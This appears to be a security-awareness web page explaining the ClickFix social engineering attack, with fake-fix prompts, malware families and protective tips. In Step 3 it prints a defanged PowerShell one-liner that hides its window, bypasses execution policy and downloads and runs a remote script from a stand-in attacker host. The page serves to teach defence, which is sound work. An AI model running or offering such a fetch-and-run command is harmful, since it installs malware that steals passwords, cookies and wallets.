How ClickFix Works

ClickFix is a social engineering attack that tricks you into running malicious code on your own computer. Here's exactly how it works, step by step.

Step 1

You Visit a Compromised Website

You might click a link in an email, a search result, or even visit a legitimate website that's been hacked. The page looks normal at first, but then something appears to go wrong.

Common Scenarios:

  • Fake CAPTCHA: "Click here to verify you're human"
  • Browser Error: "Your browser needs an update to view this page"
  • Video Conference: "Connection error - please fix to join the meeting"
  • Document Viewer: "This PDF cannot be displayed. Click to fix."
Step 2

The Fake "Fix" Instructions

A prompt appears with very specific instructions. It usually says something like:

1. Press the Windows key and R key at the same time

2. Press Ctrl + V to paste

3. Press Enter

Why this is dangerous:

The Win + R combination opens the Windows "Run" dialog, which is a powerful system tool. It can run any program or command on your computer. When you press Ctrl + V, you're pasting a command that the malicious website secretly copied to your clipboard.

Step 3

The Malicious Command Executes

When you paste and press Enter, you're running a command that looks something like this:

Real ClickFix Payload Example (defanged)
⚠️ Malicious Code Example - This is a real-world attack payload (defanged for safety). Do not execute. 

        1
        powershell -windowstyle hidden -ExecutionPolicy Bypass -Command "IEX(New-Object Net.WebClient).DownloadString('hxxps://malicious-site[.]com/payload.ps1')"

What each part does:

powershell
Launches PowerShell, a powerful command-line tool built into Windows
-windowstyle hidden
Hides the window so you don't see what's happening
-ExecutionPolicy Bypass
Disables Windows security features that would normally block suspicious scripts
IEX
Short for "Invoke-Expression" - runs whatever code comes next
New-Object Net.WebClient
Creates a tool to download files from the internet
DownloadString('hxxps://...')
Downloads a malicious script from the attacker's server and runs it immediately
Step 4

The Malware Installs

The downloaded script typically does one or more of the following:

  • Steals your passwords - Searches your browser's saved passwords and sends them to the attacker
  • Steals your cookies - Takes your login sessions so the attacker can access your accounts
  • Searches for cryptocurrency wallets - Looks for Bitcoin, Ethereum, and other crypto wallet files
  • Takes screenshots - Captures what's on your screen
  • Installs a backdoor - Gives the attacker permanent remote access to your computer

Real Malware Families Distributed via ClickFix:

  • Lumma Stealer - Most common, steals passwords and cryptocurrency
  • Vidar Stealer - Targets browser data and crypto wallets
  • DarkGate - Remote access trojan that gives full control of your PC
  • AsyncRAT - Another remote access tool used for surveillance

How to Protect Yourself

  1. Never paste commands from websites - No legitimate website will ever ask you to open the Run dialog and paste a command
  2. Be suspicious of "fix" instructions - Real technical problems don't get fixed by pasting mysterious commands
  3. Check the URL - Real Google, Microsoft, or Facebook pages won't show these prompts
  4. When in doubt, close the tab - If something feels off, just close the browser tab and navigate to the site directly

See it in Action

Try our safe, interactive demo to see what a ClickFix attack looks like.

View Interactive Demo